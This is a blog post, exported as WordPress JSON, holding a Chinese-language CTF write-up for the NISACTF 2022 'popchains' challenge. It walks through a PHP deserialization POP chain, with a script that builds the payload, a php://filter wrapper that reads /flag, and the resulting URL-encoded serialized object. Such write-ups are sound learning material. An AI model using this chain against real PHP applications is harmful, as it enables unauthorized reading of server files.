{"id":345,"date":"2024-04-25T09:15:23","date_gmt":"2024-04-25T01:15:23","guid":{"rendered":"http:\/\/danielw.top\/?p=345"},"modified":"2024-04-25T09:15:23","modified_gmt":"2024-04-25T01:15:23","slug":"nisactf-2022popchains","status":"publish","type":"post","link":"http:\/\/danielw.top\/?p=345","title":{"rendered":"[NISACTF 2022]popchains"},"content":{"rendered":"<h2>[NISACTF 2022]popchains<\/h2>\n<p>\u6253\u5f00\u8bbf\u95ee\u9875\u9762\u663e\u793a\u6e90\u4ee3\u7801\uff0c\u7ecf\u5206\u6790\u4e3a\u53cd\u5e8f\u5217\u5316\u6f0f\u6d1e<\/p>\n<p><img decoding=\"async\" src=\"http:\/\/img.danielw.top\/image-20240425090725176.png\" alt=\"image-20240425090725176\" \/><\/p>\n<p>\u5bf9\u6e90\u4ee3\u7801\u8fdb\u884c\u5206\u6790\u53caplayload\u7f16\u5199\uff1a<\/p>\n<pre><code class=\"language-php\">Happy New Year~ MAKE A WISH\n&lt;?php\n\necho &#039;Happy New Year~ MAKE A WISH&lt;br&gt;&#039;;\n\nif(isset($_GET[&#039;wish&#039;])){\n    @unserialize($_GET[&#039;wish&#039;]);    \/\/6\u3001\u8c03\u7528\u6b64\u65b9\u6cd5\u65f6\uff0c\u53cd\u5e8f\u5217\u5316Road_is_Long\u7c7b\u89e6\u53d1__wakeup()\u65b9\u6cd5\n}\nelse{\n    $a=new Road_is_Long;\n    highlight_file(__FILE__);\n}\n\/***************************pop your 2022*****************************\/\n\nclass Road_is_Long{\n    public $page;\n    public $string;\n    public function __construct($file=&#039;index.php&#039;){\n        $this-&gt;page = $file;\n    }\n    public function __toString(){\n        return $this-&gt;string-&gt;page; \/\/4\u3001\u6b64\u5904\u8bbf\u95ee\u4e86\u5bf9\u8c61\u7684\u5c5e\u6027\uff0c\u82e5\u8981\u51fa\u53d1\u6b64\u65b9\u6cd5\u9700\u8981\u6709\u628aRoad_is_Long\u5f53\u6210\u5b57\u7b26\u4e32\u5904\u7406\u7684\u51fd\u6570\uff0cstring\u4e3aMake_a_Change\uff0c\u4ed6\u6ca1\u6709page\u5c5e\u6027\n    }\n\n    public function __wakeup(){\n        if(preg_match(&quot;\/file|ftp|http|https|gopher|dict|\\.\\.\/i&quot;, $this-&gt;page)) {\n            echo &quot;You can Not Enter 2022&quot;;\n            $this-&gt;page = &quot;index.php&quot;;  \/\/5\u3001\u6b64\u5904\u4e0e\u5b57\u7b26\u4e32\u8fdb\u884c\u5bf9\u6bd4\uff0c\u65e2\u628a\u5bf9\u8c61\u5f53\u6210\u4e86\u5b57\u7b26\u4e32\u5904\u7406\uff0c\u6b64\u5904\u7684page\u4e3aRoad_is_Long\n        }\n    }\n}\n\nclass Try_Work_Hard{\n    protected  $var;\n    public function append($value){\n        include($value);    \/\/1\u3001\u6b64\u5904\u53ef\u4ee5\u5305\u542bflag.php\uff0c\u82e5\u8981\u4f7f\u7528\u6b64\u65b9\u6cd5\u9700\u8981\u8c03\u7528append\u51fd\u6570\n    }\n    public function __invoke(){\n        $this-&gt;append($this-&gt;var);  \/\/  2\u3001\u6b64\u5904\u8c03\u7528\u4e86append\u51fd\u6570\uff0c\u82e5\u8981\u6267\u884c\u6b64\u8bed\u53e5\u9700\u8981\u6267\u884c__invoke\u65b9\u6cd5\uff0c\u65e2\u9700\u8981\u5c1d\u8bd5\u4ee5\u51fd\u6570\u7684\u65b9\u6cd5\u8c03\u7528Try_Work_Hard\uff0c\u6b64\u5904\u7684var\u662f\u8981\u8bfb\u53d6\u7684flag\n    }\n}\n\nclass Make_a_Change{\n    public $effort;\n    public function __construct(){\n        $this-&gt;effort = array();\n    }\n\n    public function __get($key){\n        $function = $this-&gt;effort;      \/\/3\u3001\u6b64\u5904\u7528\u8c03\u7528\u51fd\u6570\u7684\u65b9\u6cd5\u8c03\u7528\u4e86effort\u5bf9\u8c61\uff0c\u6b64\u5904\u82e5effort\u662fTry_Work_Hard\u5219\u6210\u529f\n        return $function();\n    }\n}\n\/**********************Try to See flag*****************************\/\n\n1\u3001\u5728\u4f7f\u7528 unserialize() \u65f6\uff0c\u4f1a\u68c0\u67e5\u662f\u5426\u5b58\u5728\u4e00\u4e2a __wakeup() \u9b54\u672f\u65b9\u6cd5\u3002\u5982\u679c\u5b58\u5728\uff0c\u5219\u8be5\u65b9\u6cd5\u4f1a\u5148\u88ab\u8c03\u7528\uff0c\u9884\u5148\u51c6\u5907\u5bf9\u8c61\u9700\u8981\u7684\u8d44\u6e90\u3002\n2\u3001\u5f53\u5c1d\u8bd5\u4ee5\u8c03\u7528\u51fd\u6570\u7684\u65b9\u5f0f\u8c03\u7528\u4e00\u4e2a\u5bf9\u8c61\u65f6\uff0c__invoke() \u65b9\u6cd5\u4f1a\u88ab\u81ea\u52a8\u8c03\u7528\u3002(\u672c\u7279\u6027\u53ea\u5728 PHP 5.3.0 \u53ca\u4ee5\u4e0a\u7248\u672c\u6709\u6548\u3002)\n3\u3001\u8bfb\u53d6\u4e0d\u53ef\u8bbf\u95ee\u5c5e\u6027\u7684\u503c\u65f6\uff0c__get() \u4f1a\u88ab\u8c03\u7528\u3002\n4\u3001__toString() \u65b9\u6cd5\u7528\u4e8e\u5b9a\u4e49\u4e00\u4e2a\u7c7b\u88ab\u5f53\u6210\u5b57\u7b26\u4e32\u65f6\u8be5\u5982\u4f55\u5904\u7406\u3002\n\nplayload\uff1a\n\n&lt;?php\nclass Road_is_Long{\n    public $page;\n    public $string; \/\/string\u4e3a\n}\nclass Try_Work_Hard\n{\n    protected $var=&#039;php:\/\/filter\/convert.base64-encode\/resource=\/flag&#039;;     \/\/\u521b\u5efa\u8bfb\u53d6flag\u7684\u53d8\u91cfvar\n}\nclass Make_a_Change{\n    public $effort;\n}\n\n\/\/ \u5206\u522b\u521b\u5efa\u4e09\u4e2a\u7c7b\u7684\u5bf9\u8c61\n$r=new Road_is_Long();\n$t=new Try_Work_Hard();\n$m=new Make_a_Change();\n\n$m-&gt;effort=$t;  \/\/  Make_a_Change\u7684effort\u662fTry_Work_Hard\n$r-&gt;string=$m;  \/\/  Road_is_Long\u7684string\u662fMake_a_Change\n$r-&gt;page=$r;    \/\/  Road_is_Long\u7684page\u662fRoad_is_Long\n\n$a=serialize($r);   \/\/  \u8fdb\u884c\u5e8f\u5217\u5316\uff0c\u56e0\u4e3a\u6e90\u4ee3\u7801\u8fdb\u884c\u4e86\u53cd\u5e8f\u5217\u5316\necho urlencode($a); \/\/\u8f93\u51fa\u7ed3\u679c\uff0c\u5e76\u8fdb\u884curl\u7f16\u7801\n\n?&gt; <\/code><\/pre>\n<p>\u8fd0\u884cplayload\uff0c\u4ea7\u751f\u7ed3\u679c\uff1a<\/p>\n<pre><code class=\"language-html\">O%3A12%3A%22Road_is_Long%22%3A2%3A%7Bs%3A4%3A%22page%22%3Br%3A1%3Bs%3A6%3A%22string%22%3BO%3A13%3A%22Make_a_Change%22%3A1%3A%7Bs%3A6%3A%22effort%22%3BO%3A13%3A%22Try_Work_Hard%22%3A1%3A%7Bs%3A6%3A%22%00%2A%00var%22%3Bs%3A49%3A%22php%3A%2F%2Ffilter%2Fconvert.base64-encode%2Fresource%3D%2Fflag%22%3B%7D%7D%7D <\/code><\/pre>\n<p><img decoding=\"async\" src=\"http:\/\/img.danielw.top\/image-20240425091158997.png\" alt=\"image-20240425091158997\" \/><\/p>\n<p>\u6b64\u65f6\u7684\u7ed3\u679c\u4e3abase64\u7f16\u7801\u540e\u7684\u7ed3\u679c\uff0c\u8fdb\u884c\u89e3\u7801\uff0c\u5f97\u5230flag\uff1a<\/p>\n<p><img decoding=\"async\" src=\"http:\/\/img.danielw.top\/image-20240425091416355.png\" alt=\"image-20240425091416355\" \/><\/p>\n","protected":false},"excerpt":{"rendered":"<p>[NISACTF 2022]popchains \u6253\u5f00\u8bbf\u95ee\u9875\u9762\u663e\u793a\u6e90\u4ee3\u7801\uff0c\u7ecf\u5206\u6790\u4e3a\u53cd\u5e8f\u5217\u5316\u6f0f\u6d1e \u5bf9\u6e90\u4ee3\u7801\u8fdb\u884c\u5206\u6790\u53caplayload\u7f16 &#8230;<\/p>","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[21],"tags":[],"class_list":["post-345","post","type-post","status-publish","format-standard","hentry","category-ctf"],"_links":{"self":[{"href":"http:\/\/danielw.top\/index.php?rest_route=\/wp\/v2\/posts\/345","targetHints":{"allow":["GET"]}}],"collection":[{"href":"http:\/\/danielw.top\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"http:\/\/danielw.top\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"http:\/\/danielw.top\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"http:\/\/danielw.top\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=345"}],"version-history":[{"count":1,"href":"http:\/\/danielw.top\/index.php?rest_route=\/wp\/v2\/posts\/345\/revisions"}],"predecessor-version":[{"id":346,"href":"http:\/\/danielw.top\/index.php?rest_route=\/wp\/v2\/posts\/345\/revisions\/346"}],"wp:attachment":[{"href":"http:\/\/danielw.top\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=345"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"http:\/\/danielw.top\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=345"},{"taxonomy":"post_tag","embeddable":true,"href":"http:\/\/danielw.top\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=345"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}